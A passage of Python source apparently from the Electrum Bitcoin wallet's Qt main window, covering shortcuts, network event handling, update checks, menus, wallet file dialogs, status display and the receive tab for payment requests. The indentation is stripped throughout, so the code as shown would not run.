QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'invoice_status', 'request_status']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'channels_updated':
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
wallet.lnworker.on_channels_updated()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
if self.wallet.has_lightning():
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
if self.wallet.has_lightning():
tools_menu.addAction(_("&Lightning"), self.gui_object.show_lightning_dialog)
tools_menu.addAction(_("&Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_channels_tab(self, wallet):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', 3600)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('On-chain'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=230)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox_r = QHBoxLayout()
hbox_r.addWidget(self.receive_qr)
hbox_r.addWidget(self.receive_address_e)
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addLayout(hbox_r)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_request(self, key):
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', 3600)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, title, content):
self.app.clipboard().setText(content)
self.show_message(_("{} copied to clipboard").format(title))
#QToolTip.showText(QCursor.pos(), _("{} copied to clipboard").format(title), self.parent)
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
def update_receive_qr(self):
uri = str(self.receive_address_e.text())
self.receive_qr.setData(uri)
